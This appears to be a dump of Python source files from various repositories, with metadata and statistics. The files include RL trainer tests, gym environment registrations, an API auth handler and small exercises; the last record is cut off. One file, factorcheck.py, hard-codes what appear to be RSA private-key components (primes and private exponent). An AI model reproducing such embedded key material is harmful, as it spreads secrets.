| column | dtype | range |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 5 to 2.06M |
| ext | string | 10 distinct values |
| lang | string | 1 distinct value |
| max_stars_repo_path | string | length 3 to 248 |
| max_stars_repo_name | string | length 5 to 125 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 | 1 to 191k (nullable) |
| max_stars_repo_stars_event_min_datetime | string | length 24 (nullable) |
| max_stars_repo_stars_event_max_datetime | string | length 24 (nullable) |
| max_issues_repo_path | string | length 3 to 248 |
| max_issues_repo_name | string | length 5 to 125 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 | 1 to 67k (nullable) |
| max_issues_repo_issues_event_min_datetime | string | length 24 (nullable) |
| max_issues_repo_issues_event_max_datetime | string | length 24 (nullable) |
| max_forks_repo_path | string | length 3 to 248 |
| max_forks_repo_name | string | length 5 to 125 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 | 1 to 105k (nullable) |
| max_forks_repo_forks_event_min_datetime | string | length 24 (nullable) |
| max_forks_repo_forks_event_max_datetime | string | length 24 (nullable) |
| content | string | length 5 to 2.06M |
| avg_line_length | float64 | 1 to 1.02M |
| max_line_length | int64 | 3 to 1.03M |
| alphanum_fraction | float64 | 0 to 1 |
| count_classes | int64 | 0 to 1.6M |
| score_classes | float64 | 0 to 1 |
| count_generators | int64 | 0 to 651k |
| score_generators | float64 | 0 to 1 |
| count_decorators | int64 | 0 to 990k |
| score_decorators | float64 | 0 to 1 |
| count_async_functions | int64 | 0 to 235k |
| score_async_functions | float64 | 0 to 1 |
| count_documentation | int64 | 0 to 1.04M |
| score_documentation | float64 | 0 to 1 |
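Each record below prints its cells one per line, in the column order given above, with the raw Python file in the `content` cell followed by the per-file statistics. From the visible rows, the `score_*` columns appear to be the matching `count_*` value divided by `size` (for the first record, 199 / 273 ≈ 0.7289 matches `score_classes`), and `avg_line_length` appears to be `size` divided by the line count. The sketch below recomputes these derived fields for a single record under those assumptions; the function name is illustrative and the counting rules behind the `count_*` columns themselves are not documented here, so this is a plausibility check rather than the original pipeline.

```python
# Minimal sketch (not the original pipeline): recompute the apparent
# derived columns of one record and compare them to the stored values.
# Assumptions, inferred from the rows shown below:
#   score_<x>          ~= count_<x> / size
#   avg_line_length    ~= size / number_of_lines
#   max_line_length    ~= length of the longest line
#   alphanum_fraction  ~= alphanumeric characters / size
# "size" may be bytes rather than characters; that distinction only
# matters for non-ASCII files.

def check_derived_fields(record: dict) -> dict:
    """Return the recomputed derived columns for one dataset record."""
    content = record["content"]
    size = record["size"]
    lines = content.splitlines() or [""]

    derived = {
        "avg_line_length": size / len(lines),
        "max_line_length": max(len(line) for line in lines),
        "alphanum_fraction": sum(c.isalnum() for c in content) / size,
    }
    for feature in ("classes", "generators", "decorators",
                    "async_functions", "documentation"):
        derived[f"score_{feature}"] = record[f"count_{feature}"] / size
    return derived

# Example with the first record below (content abbreviated):
# check_derived_fields({"content": "...", "size": 273, "count_classes": 199, ...})
# -> {"score_classes": 0.7289..., ...}, matching the stored score_classes cell.
```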
b284e34183349b94655f2ba4c0ad549e6e0f8f3f
| 273
|
py
|
Python
|
dsfaker/generators/str.py
|
pajachiet/dsfaker
|
0e65ba336608c2ccc5e32a541f3b66dfad019b35
|
[
"MIT"
] | 3
|
2017-03-12T22:08:59.000Z
|
2017-05-22T16:57:17.000Z
|
dsfaker/generators/str.py
|
pajachiet/dsfaker
|
0e65ba336608c2ccc5e32a541f3b66dfad019b35
|
[
"MIT"
] | 12
|
2017-03-01T10:14:08.000Z
|
2017-04-23T12:15:10.000Z
|
dsfaker/generators/str.py
|
pajachiet/dsfaker
|
0e65ba336608c2ccc5e32a541f3b66dfad019b35
|
[
"MIT"
] | 2
|
2017-05-04T15:36:21.000Z
|
2018-02-07T13:49:13.000Z
|
from random import Random
from rstr import Rstr
from . import Generator
class Regex(Generator):
def __init__(self, regex, seed=None):
self.gen = Rstr(Random(seed))
self.regex = regex
def get_single(self):
return self.gen.xeger(self.regex)
| 22.75
| 41
| 0.677656
| 199
| 0.728938
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b285955d688db6c4b472e2c5faffe22749cd5bcf
| 7,081
|
py
|
Python
|
ssh/factorcheck.py
|
riquelmev/cs338
|
cdbff5e25b112a9fb2e039f59c0ebf036649ffd8
|
[
"MIT"
] | null | null | null |
ssh/factorcheck.py
|
riquelmev/cs338
|
cdbff5e25b112a9fb2e039f59c0ebf036649ffd8
|
[
"MIT"
] | null | null | null |
ssh/factorcheck.py
|
riquelmev/cs338
|
cdbff5e25b112a9fb2e039f59c0ebf036649ffd8
|
[
"MIT"
] | null | null | null |
import numpy
import math
print(math.lcm(0x00eca08bfa42dcad582302232a80813894fd2e4b842dca21eba465619a0d464a9f864ab2e9c0be42367d63c595e81385dcb66bbf8242cddb848969f883af2fbb8c1490a3932c03d15b2d7dfb08dd2c61e05978fbfd337e70ba838574cfe443658910aef9303e968d32351339c14a3c08920a5c1a854cea5af98bd32f1098a2fc5f8a468009c7c063f48c29a688bc485f580625883b8a13ff655d34a11f927ddcfadfdc25c9e318127a83e8fb48ada3f531a5160fc9849852e2e51cba9001cc18e4,
0x00d63e8c9986e6067792268a91b4b65721256fe5ff7de459f80348b882d67a024032e38d9dc3d12943e95f97c9efe381399f16697311ad2766ab98dbe08c30fcd312754bbeb344c88fa2f8ff7ce6ac36d68e4950dfd6599270cfa9b36cec3384323efe64731a69aedee1761104f65a6f84eab6806c90af902b7a24c422cf4673986eb7b18650de51b10109de23668e471354f543b2d05386f4aa44feaf00fe0e0ca8335ba9cd0a0cd7b44233fcec489a3217eb3da1d9b51c4d8e9ba40cfd6cb7aa))
print (( (65537 * 2943845207193600139849586921660530062979514836939652252911168510314905302166532845264906113584033646531012076406573806987025047457519902435411802267739360377120761697446091031629022721340581940013244671666962132695199042194704089512690548281464483553640422003142860526990759194808923501682158662399385088877090264964084503057490757632128265341366808789218428209326618760642760356184383281196480504761667539912421070047089521150757775831975677601090160692307767419292257798639731268363386233177395498370665722400495226560396671910091288741087409721516597979322885628216630331527097105539998928620712679031068142304793554336036922257467880853151468114731275288628988864368750827488439382991282564278525342098508917887127750683566587189942598936549588448717091038482697327056078134954278878301931522106687291086778640089700384840670406150969051320700177941289226071446754539534444766951378823161600415971105082067617171855980113)
% 2247039172418436668592154415151015126222786674452760187503368863970509536315956942465946330840400804713521295730929741305714657992353620380964165912192341731136307469898957232004091102824338674617377312450939870608493589894180315797731195699072185635394040726997130798478842130796557413577261032584072916023035927031809993907276633856706151009517313622397019910955492822225070876581131226412459152580542808796183783690613859162091921205452946458684438170181390092687592585015747357730389512738725469097581172245064706069050974691027868509488068610750445862693733466299013534093773154038841250698994256296984775707305557541589235662563155223305238362859813517247589601725306580259839877045186180003746975834031900204620211932784805784617611303338578827900908401922205156339089130334248484128507875195736838993177401998121291885662897832705086377879426528514698451483880180031084401254280385901954419537599741014039443185713588 == 1))
print((32**65537) % 2247039172418436668592154415151015126222786674452760187503368863970509536315956942465946330840400804713521295730929741305714657992353620380964165912192341731136307469898957232004091102824338674617377312450939870608493589894180315797731195699072185635394040726997130798478842130796557413577261032584072916023035927031809993907276633856706151009517313622397019910955492822225070876581131226412459152580542808796183783690613859162091921205452946458684438170181390092687592585015747357730389512738725469097581172245064706069050974691027868509488068610750445862693733466299013534093773154038841250698994256296984775707305557541589235662563155223305238362859813517247589601725306580259839877045186180003746975834031900204620211932784805784617611303338578827900908401922205156339089130334248484128507875195736838993177401998121291885662897832705086377879426528514698451483880180031084401254280385901954419537599741014039443185713588)
print(2943845207193600139849586921660530062979514836939652252911168510314905302166532845264906113584033646531012076406573806987025047457519902435411802267739360377120761697446091031629022721340581940013244671666962132695199042194704089512690548281464483553640422003142860526990759194808923501682158662399385088877090264964084503057490757632128265341366808789218428209326618760642760356184383281196480504761667539912421070047089521150757775831975677601090160692307767419292257798639731268363386233177395498370665722400495226560396671910091288741087409721516597979322885628216630331527097105539998928620712679031068142304793554336036922257467880853151468114731275288628988864368750827488439382991282564278525342098508917887127750683566587189942598936549588448717091038482697327056078134954278878301931522106687291086778640089700384840670406150969051320700177941289226071446754539534444766951378823161600415971105082067617171855980113%0x00eca08bfa42dcad582302232a80813894fd2e4b842dca21eba465619a0d464a9f864ab2e9c0be42367d63c595e81385dcb66bbf8242cddb848969f883af2fbb8c1490a3932c03d15b2d7dfb08dd2c61e05978fbfd337e70ba838574cfe443658910aef9303e968d32351339c14a3c08920a5c1a854cea5af98bd32f1098a2fc5f8a468009c7c063f48c29a688bc485f580625883b8a13ff655d34a11f927ddcfadfdc25c9e318127a83e8fb48ada3f531a5160fc9849852e2e51cba9001cc18e4
== 0x283f4a6fbfad9f424d7a10972b124f986fd3cefe65776afb9493b5dd2902dab0757c0120672b3541e563f1f88467c5adfbcd29deb31426914d7a1bcdf21f314c2b374acb3e824bbab16b2b269fcfebb9e81dfee65b3ad75bb201221436240c821ab758250f9035e5e34728dcaa8eb97a758ea2e82763f92356d80dba49ebf6f71d22cea65b366b09ee492b4d38912abe6315412db7579d6a15475d5c6c634211ddbfa921c4a1948b0822b992ec0de6279287c519a696ee0a2fa40a4b7232cfcd)
print(2943845207193600139849586921660530062979514836939652252911168510314905302166532845264906113584033646531012076406573806987025047457519902435411802267739360377120761697446091031629022721340581940013244671666962132695199042194704089512690548281464483553640422003142860526990759194808923501682158662399385088877090264964084503057490757632128265341366808789218428209326618760642760356184383281196480504761667539912421070047089521150757775831975677601090160692307767419292257798639731268363386233177395498370665722400495226560396671910091288741087409721516597979322885628216630331527097105539998928620712679031068142304793554336036922257467880853151468114731275288628988864368750827488439382991282564278525342098508917887127750683566587189942598936549588448717091038482697327056078134954278878301931522106687291086778640089700384840670406150969051320700177941289226071446754539534444766951378823161600415971105082067617171855980113%
0x00d63e8c9986e6067792268a91b4b65721256fe5ff7de459f80348b882d67a024032e38d9dc3d12943e95f97c9efe381399f16697311ad2766ab98dbe08c30fcd312754bbeb344c88fa2f8ff7ce6ac36d68e4950dfd6599270cfa9b36cec3384323efe64731a69aedee1761104f65a6f84eab6806c90af902b7a24c422cf4673986eb7b18650de51b10109de23668e471354f543b2d05386f4aa44feaf00fe0e0ca8335ba9cd0a0cd7b44233fcec489a3217eb3da1d9b51c4d8e9ba40cfd6cb7aa
== 0x47d9c4577cc94a23f1ace14e0a5818927236bbe0da7ca9bba6864df2fb3101ee3be2daccad2e49739021d20b145bad2c00f1883de210bb2510a97c1c2b880652575f651eb88a79e4ca184dbebab1c8d65df3b29ecf094d366e3e9081181a12dcb309a7f07e4c312c685aab4c89be3ca64bfd16c6d2233eeb85d42cbf2bda89cbf65dbeb8b8084747607cc9b5ff9ff9b03f0ede3c6ae7885c277a6a1b90eea311959b5bc36f934e494d17e2cd9104ac49de81b332c38b9cc959e952b4548d906f)
| 337.190476
| 1,320
| 0.990679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b286d23fc369a16764ed55694919ccd382975d06
| 138
|
py
|
Python
|
main1.py
|
dubblin27/bible-of-algo
|
4f893ba0d32d8d169abf4c4485f105cc8169cdbb
|
[
"MIT"
] | null | null | null |
main1.py
|
dubblin27/bible-of-algo
|
4f893ba0d32d8d169abf4c4485f105cc8169cdbb
|
[
"MIT"
] | null | null | null |
main1.py
|
dubblin27/bible-of-algo
|
4f893ba0d32d8d169abf4c4485f105cc8169cdbb
|
[
"MIT"
] | null | null | null |
su = 0
a = [3,5,6,2,7,1]
print(sum(a))
x, y = input("Enter a two value: ").split()
x = int(x)
y = int(y)
su = a[y] + sum(a[:y])
print(su)
| 17.25
| 44
| 0.514493
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 21
| 0.152174
|
b2887d26206a7158175689bb0d3fde0011f6d15d
| 8,099
|
py
|
Python
|
reagent/test/training/test_qrdqn.py
|
dmitryvinn/ReAgent
|
f98825b9d021ec353a1f9087840a05fea259bf42
|
[
"BSD-3-Clause"
] | 1,156
|
2019-10-02T12:15:31.000Z
|
2022-03-31T16:01:27.000Z
|
reagent/test/training/test_qrdqn.py
|
dmitryvinn/ReAgent
|
f98825b9d021ec353a1f9087840a05fea259bf42
|
[
"BSD-3-Clause"
] | 448
|
2019-10-03T13:40:52.000Z
|
2022-03-28T07:49:15.000Z
|
reagent/test/training/test_qrdqn.py
|
dmitryvinn/ReAgent
|
f98825b9d021ec353a1f9087840a05fea259bf42
|
[
"BSD-3-Clause"
] | 214
|
2019-10-13T13:28:33.000Z
|
2022-03-24T04:11:52.000Z
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import unittest
import torch
from reagent.core.parameters import EvaluationParameters, RLParameters
from reagent.core.types import FeatureData, DiscreteDqnInput, ExtraData
from reagent.evaluation.evaluator import get_metrics_to_score
from reagent.models.dqn import FullyConnectedDQN
from reagent.training.parameters import QRDQNTrainerParameters
from reagent.training.qrdqn_trainer import QRDQNTrainer
from reagent.workflow.types import RewardOptions
class TestQRDQN(unittest.TestCase):
def setUp(self):
# preparing various components for qr-dqn trainer initialization
self.params = QRDQNTrainerParameters(actions=["1", "2"], num_atoms=11)
self.reward_options = RewardOptions()
self.metrics_to_score = get_metrics_to_score(
self.reward_options.metric_reward_values
)
self.state_dim = 10
self.action_dim = 2
self.sizes = [20, 20]
self.num_atoms = 11
self.activations = ["relu", "relu"]
self.dropout_ratio = 0
self.q_network = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.action_dim,
sizes=self.sizes,
num_atoms=self.num_atoms,
activations=self.activations,
dropout_ratio=self.dropout_ratio,
)
self.q_network_target = self.q_network.get_target_network()
self.x = FeatureData(float_features=torch.rand(5, 10))
self.eval_parameters = EvaluationParameters(calc_cpe_in_training=True)
self.num_output_nodes = (len(self.metrics_to_score) + 1) * len(
# pyre-fixme[16]: `QRDQNTrainerParameters` has no attribute `actions`.
self.params.actions
)
self.reward_network = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.num_output_nodes,
sizes=self.sizes,
activations=self.activations,
)
self.q_network_cpe = FullyConnectedDQN(
state_dim=self.state_dim,
action_dim=self.num_output_nodes,
sizes=self.sizes,
activations=self.activations,
)
self.q_network_cpe_target = self.q_network_cpe.get_target_network()
def _construct_trainer(self, new_params=None, no_cpe=False):
reward_network = self.reward_network
q_network_cpe = self.q_network_cpe
q_network_cpe_target = self.q_network_cpe_target
evaluation = self.eval_parameters
params = self.params
if new_params is not None:
params = new_params
if no_cpe:
reward_network = q_network_cpe = q_network_cpe_target = None
evaluation = EvaluationParameters(calc_cpe_in_training=False)
return QRDQNTrainer(
q_network=self.q_network,
q_network_target=self.q_network_target,
reward_network=reward_network,
q_network_cpe=q_network_cpe,
q_network_cpe_target=q_network_cpe_target,
metrics_to_score=self.metrics_to_score,
evaluation=evaluation,
# pyre-fixme[16]: `QRDQNTrainerParameters` has no attribute `asdict`.
**params.asdict()
)
def test_init(self):
trainer = self._construct_trainer()
quantiles = (0.5 + torch.arange(self.num_atoms).float()) / float(self.num_atoms)
self.assertTrue((torch.isclose(trainer.quantiles, quantiles)).all())
self.assertTrue((torch.isclose(trainer.reward_boosts, torch.zeros(2))).all())
param_copy = QRDQNTrainerParameters(
actions=["1", "2"],
num_atoms=11,
rl=RLParameters(reward_boost={"1": 1, "2": 2}),
)
reward_boost_trainer = self._construct_trainer(new_params=param_copy)
self.assertTrue(
(
torch.isclose(
reward_boost_trainer.reward_boosts, torch.tensor([1.0, 2.0])
)
).all()
)
def test_train_step_gen(self):
inp = DiscreteDqnInput(
state=FeatureData(float_features=torch.rand(3, 10)),
next_state=FeatureData(float_features=torch.rand(3, 10)),
reward=torch.ones(3, 1),
time_diff=torch.ones(3, 1) * 2,
step=torch.ones(3, 1) * 2,
not_terminal=torch.ones(3, 1), # todo: check terminal behavior
action=torch.tensor([[0, 1], [1, 0], [0, 1]]),
next_action=torch.tensor([[1, 0], [0, 1], [1, 0]]),
possible_actions_mask=torch.ones(3, 2),
possible_next_actions_mask=torch.ones(3, 2),
extras=ExtraData(),
)
mse_backward_type = type(
torch.nn.functional.mse_loss(
torch.tensor([1.0], requires_grad=True), torch.zeros(1)
).grad_fn
)
add_backward_type = type(
(
torch.tensor([1.0], requires_grad=True)
+ torch.tensor([1.0], requires_grad=True)
).grad_fn
)
mean_backward_type = type(
torch.tensor([1.0, 2.0], requires_grad=True).mean().grad_fn
)
# vanilla
trainer = self._construct_trainer()
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
self.assertEqual(type(losses[0].grad_fn), mean_backward_type)
self.assertEqual(type(losses[1].grad_fn), mse_backward_type)
self.assertEqual(type(losses[2].grad_fn), mse_backward_type)
self.assertEqual(type(losses[3].grad_fn), add_backward_type)
# no CPE
trainer = self._construct_trainer(no_cpe=True)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 2)
# seq_num
param_copy = QRDQNTrainerParameters(
actions=["1", "2"],
num_atoms=11,
rl=RLParameters(use_seq_num_diff_as_time_diff=True),
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
# multi_steps
param_copy = QRDQNTrainerParameters(
actions=["1", "2"], num_atoms=11, rl=RLParameters(multi_steps=2)
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
# non_max_q
param_copy = QRDQNTrainerParameters(
actions=["1", "2"], num_atoms=11, rl=RLParameters(maxq_learning=False)
)
trainer = self._construct_trainer(new_params=param_copy)
loss_gen = trainer.train_step_gen(inp, batch_idx=1)
losses = list(loss_gen)
self.assertEqual(len(losses), 4)
def test_configure_optimizers(self):
trainer = self._construct_trainer()
optimizers = trainer.configure_optimizers()
self.assertEqual(len(optimizers), 4)
train_step_yield_order = [
trainer.q_network,
trainer.reward_network,
trainer.q_network_cpe,
trainer.q_network,
]
for i in range(len(train_step_yield_order)):
opt_param = optimizers[i]["optimizer"].param_groups[0]["params"][0]
loss_param = list(train_step_yield_order[i].parameters())[0]
self.assertTrue(torch.all(torch.isclose(opt_param, loss_param)))
trainer = self._construct_trainer(no_cpe=True)
optimizers = trainer.configure_optimizers()
self.assertEqual(len(optimizers), 2)
def test_get_detached_model_outputs(self):
trainer = self._construct_trainer()
q_out, q_target = trainer.get_detached_model_outputs(self.x)
self.assertEqual(q_out.shape[0], q_target.shape[0], 3)
self.assertEqual(q_out.shape[1], q_target.shape[1], 2)
| 40.293532
| 88
| 0.633782
| 7,548
| 0.931967
| 0
| 0
| 0
| 0
| 0
| 0
| 444
| 0.054822
|
b28976d7d07ee0d85891e3ce1f95a592baa06a72
| 717
|
py
|
Python
|
highway_env/__init__.py
|
songanz/highway-env
|
ac21d1da25e224dbdbf8ba39509f4013bd029f52
|
[
"MIT"
] | 1
|
2019-11-06T15:28:27.000Z
|
2019-11-06T15:28:27.000Z
|
highway_env/__init__.py
|
songanz/highway-env
|
ac21d1da25e224dbdbf8ba39509f4013bd029f52
|
[
"MIT"
] | null | null | null |
highway_env/__init__.py
|
songanz/highway-env
|
ac21d1da25e224dbdbf8ba39509f4013bd029f52
|
[
"MIT"
] | 1
|
2019-07-22T03:37:09.000Z
|
2019-07-22T03:37:09.000Z
|
from gym.envs.registration import register
register(
id='highway-v0',
entry_point='highway_env.envs:HighwayEnv',
)
register(
id='highway-continuous-v0',
entry_point='highway_env.envs:HighwayEnvCon',
)
register(
id='highway-continuous-intrinsic-rew-v0',
entry_point='highway_env.envs:HighwayEnvCon_intrinsic_rew',
)
register(
id='merge-v0',
entry_point='highway_env.envs:MergeEnv',
)
register(
id='roundabout-v0',
entry_point='highway_env.envs:RoundaboutEnv',
)
register(
id='two-way-v0',
entry_point='highway_env.envs:TwoWayEnv',
max_episode_steps=15
)
register(
id='parking-v0',
entry_point='highway_env.envs:ParkingEnv',
max_episode_steps=20
)
| 18.384615
| 63
| 0.714086
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 344
| 0.479777
|
b28b3da62fcf1d7ad1f84230a298ab9d0ed79266
| 700
|
py
|
Python
|
twitcaspy/auth/app.py
|
Alma-field/twitcaspy
|
25f3e850f2d5aab8a864bd6b7003468587fa3ea7
|
[
"MIT"
] | null | null | null |
twitcaspy/auth/app.py
|
Alma-field/twitcaspy
|
25f3e850f2d5aab8a864bd6b7003468587fa3ea7
|
[
"MIT"
] | 18
|
2021-10-01T13:40:01.000Z
|
2021-10-18T12:34:57.000Z
|
twitcaspy/auth/app.py
|
Alma-field/twitcaspy
|
25f3e850f2d5aab8a864bd6b7003468587fa3ea7
|
[
"MIT"
] | null | null | null |
# Twitcaspy
# Copyright 2021 Alma-field
# See LICENSE for details.
#
# based on tweepy(https://github.com/tweepy/tweepy)
# Copyright (c) 2009-2021 Joshua Roesslein
from .auth import AuthHandler
from .oauth import OAuth2Basic
class AppAuthHandler(AuthHandler):
"""
Application-only authentication handler
Parameters
----------
client_id: :class:`str`
|client_id|
client_secret: :class:`str`
|client_secret|
References
----------
https://apiv2-doc.twitcasting.tv/#access-token
"""
def __init__(self, client_id, client_secret):
super().__init__(client_id, client_secret)
self.auth = OAuth2Basic(client_id, client_secret)
| 22.580645
| 57
| 0.671429
| 471
| 0.672857
| 0
| 0
| 0
| 0
| 0
| 0
| 430
| 0.614286
|
b28b8885604c48606cb8d4e162a310c2bb979435
| 1,005
|
py
|
Python
|
tests/test_topic_matching.py
|
InfraPixels/powerlibs-aws-sqs-dequeue_to_api
|
67ae744c96c7658229acc6fd1b1c432d24f0817d
|
[
"MIT"
] | null | null | null |
tests/test_topic_matching.py
|
InfraPixels/powerlibs-aws-sqs-dequeue_to_api
|
67ae744c96c7658229acc6fd1b1c432d24f0817d
|
[
"MIT"
] | null | null | null |
tests/test_topic_matching.py
|
InfraPixels/powerlibs-aws-sqs-dequeue_to_api
|
67ae744c96c7658229acc6fd1b1c432d24f0817d
|
[
"MIT"
] | 1
|
2021-05-26T00:16:26.000Z
|
2021-05-26T00:16:26.000Z
|
def test_topic_regexp_matching(dequeuer):
msg = {'company_name': 'test_company'}
actions_1 = tuple(dequeuer.get_actions_for_topic('object__created', msg))
actions_2 = tuple(dequeuer.get_actions_for_topic('object__deleted', msg))
actions_3 = tuple(dequeuer.get_actions_for_topic('otherthing__created', msg))
assert actions_1 == actions_2
assert actions_1 != actions_3
def test_topic_regexp_matching_with_groups(dequeuer):
msg = {'company_name': 'test_company'}
actions_1 = tuple(dequeuer.get_actions_for_topic('step__alfa__started', msg))
payload = actions_1[0][1]['run'].args[2][0]
assert 'name' in payload
assert payload['name'] == 'alfa'
assert 'status' in payload
assert payload['status'] == 'started', payload
actions_2 = tuple(dequeuer.get_actions_for_topic('step__beta__finished', msg))
actions_3 = tuple(dequeuer.get_actions_for_topic('otherthing__created', msg))
assert actions_1 == actions_2
assert actions_1 != actions_3
| 38.653846
| 82
| 0.736318
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 223
| 0.221891
|
b28d0dae8fb9ed9ee50b81bbf1aae13554854cbe
| 1,352
|
py
|
Python
|
src/baskerville/models/model_interface.py
|
deflect-ca/baskerville
|
9659f4b39ab66fcf5329a4eccff15e97245b04f0
|
[
"CC-BY-4.0"
] | 2
|
2021-12-03T11:26:38.000Z
|
2022-01-12T22:24:29.000Z
|
src/baskerville/models/model_interface.py
|
deflect-ca/baskerville
|
9659f4b39ab66fcf5329a4eccff15e97245b04f0
|
[
"CC-BY-4.0"
] | 3
|
2022-01-19T15:17:37.000Z
|
2022-03-22T04:55:22.000Z
|
src/baskerville/models/model_interface.py
|
deflect-ca/baskerville
|
9659f4b39ab66fcf5329a4eccff15e97245b04f0
|
[
"CC-BY-4.0"
] | null | null | null |
# Copyright (c) 2020, eQualit.ie inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import inspect
import logging
class ModelInterface(object):
def __init__(self):
super().__init__()
self.logger = logging.getLogger(self.__class__.__name__)
def get_param_names(self):
return list(inspect.signature(self.__init__).parameters.keys())
def set_params(self, **params):
param_names = self.get_param_names()
for key, value in params.items():
if key not in param_names:
raise RuntimeError(
f'Class {self.__class__.__name__} does not '
f'have {key} attribute')
setattr(self, key, value)
def get_params(self):
params = {}
for name in self.get_param_names():
params[name] = getattr(self, name)
return params
def _get_class_path(self):
return f'{self.__class__.__module__}.{self.__class__.__name__}'
def train(self, df):
pass
def predict(self, df):
pass
def save(self, path, spark_session=None):
pass
def load(self, path, spark_session=None):
pass
def set_logger(self, logger):
self.logger = logger
| 26
| 71
| 0.621302
| 1,124
| 0.831361
| 0
| 0
| 0
| 0
| 0
| 0
| 311
| 0.23003
|
b28d6cf5837de54ecfea09556ec7ac0f5538da24
| 2,253
|
py
|
Python
|
setup_win(MPL2).py
|
iefan/army_holiday
|
0c79cf89c4dbb16bd87ca754265821f82b298f13
|
[
"Apache-2.0"
] | null | null | null |
setup_win(MPL2).py
|
iefan/army_holiday
|
0c79cf89c4dbb16bd87ca754265821f82b298f13
|
[
"Apache-2.0"
] | null | null | null |
setup_win(MPL2).py
|
iefan/army_holiday
|
0c79cf89c4dbb16bd87ca754265821f82b298f13
|
[
"Apache-2.0"
] | null | null | null |
# Used successfully in Python2.5 with matplotlib 0.91.2 and PyQt4 (and Qt 4.3.3)
from distutils.core import setup
import py2exe
import sys
# no arguments
if len(sys.argv) == 1:
sys.argv.append("py2exe")
# We need to import the glob module to search for all files.
import glob
# We need to exclude matplotlib backends not being used by this executable. You may find
# that you need different excludes to create a working executable with your chosen backend.
# We also need to include include various numerix libraries that the other functions call.
opts = {
'py2exe': { "includes" : ["matplotlib.backends", "matplotlib.backends.backend_qt4agg",
"matplotlib.figure","pylab", "numpy", "matplotlib.numerix.fft",
"matplotlib.numerix.linear_algebra", "matplotlib.numerix.random_array",
"matplotlib.backends.backend_tkagg"],
'excludes': ['_gtkagg', '_tkagg', '_agg2', '_cairo', '_cocoaagg',
'_fltkagg', '_gtk', '_gtkcairo', ],
'dll_excludes': ['libgdk-win32-2.0-0.dll',
'libgobject-2.0-0.dll'],
"compressed": 1,
}
}
# Save matplotlib-data to mpl-data ( It is located in the matplotlib\mpl-data
# folder and the compiled programs will look for it in \mpl-data
# note: using matplotlib.get_mpldata_info
data_files = [(r'mpl-data', glob.glob(r'C:\Python25\Lib\site-packages\matplotlib\mpl-data\*.*')),
# Because matplotlibrc does not have an extension, glob does not find it (at least I think that's why)
# So add it manually here:
(r'mpl-data', [r'C:\Python25\Lib\site-packages\matplotlib\mpl-data\matplotlibrc']),
(r'mpl-data\images',glob.glob(r'C:\Python25\Lib\site-packages\matplotlib\mpl-data\images\*.*')),
(r'mpl-data\fonts',glob.glob(r'C:\Python25\Lib\site-packages\matplotlib\mpl-data\fonts\*.*'))]
# for console program use 'console = [{"script" : "scriptname.py"}]
setup(windows=[{"script" : "frmlogin.pyw", "icon_resources": [(0, "bitmap/PHRLogo.ico")]}], options=opts, \
zipfile = None, data_files=data_files)
| 51.204545
| 122
| 0.625388
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,557
| 0.691079
|
b28f9f150dd905146af9d33f4c81aae2c96483db
| 1,529
|
py
|
Python
|
GeeksForGeeks/Sudo Placement 2019/Find the closest number.py
|
nayanapardhekar/Python
|
55ea0cc1dd69192b25cb71358cd03cc2ce13be0a
|
[
"MIT"
] | 37
|
2019-04-03T07:19:57.000Z
|
2022-01-09T06:18:41.000Z
|
GeeksForGeeks/Sudo Placement 2019/Find the closest number.py
|
nayanapardhekar/Python
|
55ea0cc1dd69192b25cb71358cd03cc2ce13be0a
|
[
"MIT"
] | 16
|
2020-08-11T08:09:42.000Z
|
2021-10-30T17:40:48.000Z
|
GeeksForGeeks/Sudo Placement 2019/Find the closest number.py
|
nayanapardhekar/Python
|
55ea0cc1dd69192b25cb71358cd03cc2ce13be0a
|
[
"MIT"
] | 130
|
2019-10-02T14:40:20.000Z
|
2022-01-26T17:38:26.000Z
|
# Find the closest number
# Difficulty: Basic Marks: 1
'''
Given an array of sorted integers. The task is to find the closest value to the given number in array. Array may contain duplicate values.
Note: If the difference is same for two values print the value which is greater than the given number.
Input:
The first line of input contains an integer T denoting the number of test cases. Then T test cases follow. Each test case consists of two lines. First line of each test case contains two integers N & K and the second line contains N space separated array elements.
Output:
For each test case, print the closest number in new line.
Constraints:
1<=T<=100
1<=N<=105
1<=K<=105
1<=A[i]<=105
Example:
Input:
2
4 4
1 3 6 7
7 4
1 2 3 5 6 8 9
Output:
3
5
'''
for _ in range(int(input())):
n1,n2=map(int,input().split())
a=list(map(int,input().split()))
a.append(n2)
a.sort()
for i in range(len(a)):
if a[-1]==n2:
print(a[-2])
break
else:
if a[i]==n2:
if a[i+1]==n2:
print(n2)
break
else:
if abs(n2-a[i+1])==abs(n2-a[i-1]):
print(a[i+1])
break
else:
if abs(n2-a[i+1])>abs(n2-a[i-1]):
print(a[i-1])
break
else:
print(a[i+1])
break
| 26.824561
| 264
| 0.517986
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 766
| 0.500327
|
b2910846552317313e27d4630f9b125c62fc3263
| 4,391
|
py
|
Python
|
qcodes/tests/test_sweep_values.py
|
riju-pal/QCoDeS_riju
|
